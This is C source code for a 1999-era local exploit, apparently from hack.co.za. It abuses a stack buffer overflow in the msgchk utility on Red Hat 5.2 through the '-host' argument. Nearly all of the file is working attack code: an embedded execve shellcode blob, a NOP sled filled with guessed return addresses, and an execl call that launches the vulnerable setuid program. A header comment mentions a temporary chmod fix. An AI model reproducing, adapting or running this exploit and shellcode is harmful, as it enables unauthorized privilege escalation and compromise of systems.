/*
 * coded on; ver. on Linux 2.0.36 / redhat 5.2 (others affected)
 * id: Fri Mar 26 05:50:47 AST 1999 FreeBSD 3.1-STABLE #1:
 * Thu Nov 12 23:45:17 AST 1998 icesk@urban-a.net:/usr/src/sys/compile/ICESK
 * msgchk overflow for Linux 2.0.36 on a RedHat 5.2 out of box install.
 * This overflow was not found by me and a non-working version was released.
 * Note this overflow was found in -host and other overflows posibly
 * remain uncomented on.
 * Temperary fix: chmod 700 `which msgchk`
 * The following code is july 1999 icesk..
 */
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

#define nop      0x90

/* not my shellcode */
char shellcode[] =
  "\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
  "\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
  "\xeb\x05\xe8\xdb\xff\xff\xff"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

u_long get_sp(void)
{
  __asm__("movl %esp,%eax");
}

void main(int argc, char **argv)
{
  char *buffer, *ptr;
  long *address_ptr, *address;
  int i, desc, offset = 0, bsize = 1018;

  buffer = malloc(bsize);

  (char *)address = get_sp() - offset;
  printf("return address %#x\n" ,address);

  ptr = buffer;
  address_ptr = (long *)ptr;

  for(i=0;i < bsize;i += 4)
    (int *)*(address_ptr++) = address;

  for(i=0;i < bsize / 2; i++)
    buffer[i] = nop;

  ptr = buffer + ((bsize / 2) - (strlen(shellcode) / 2));
  for(i=0;i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buffer[bsize - 1] = '\0';

  execl("/usr/bin/mh/msgchk", "msgchk", "-host", buffer, 0);
}
/*                    www.hack.co.za              [2000]*/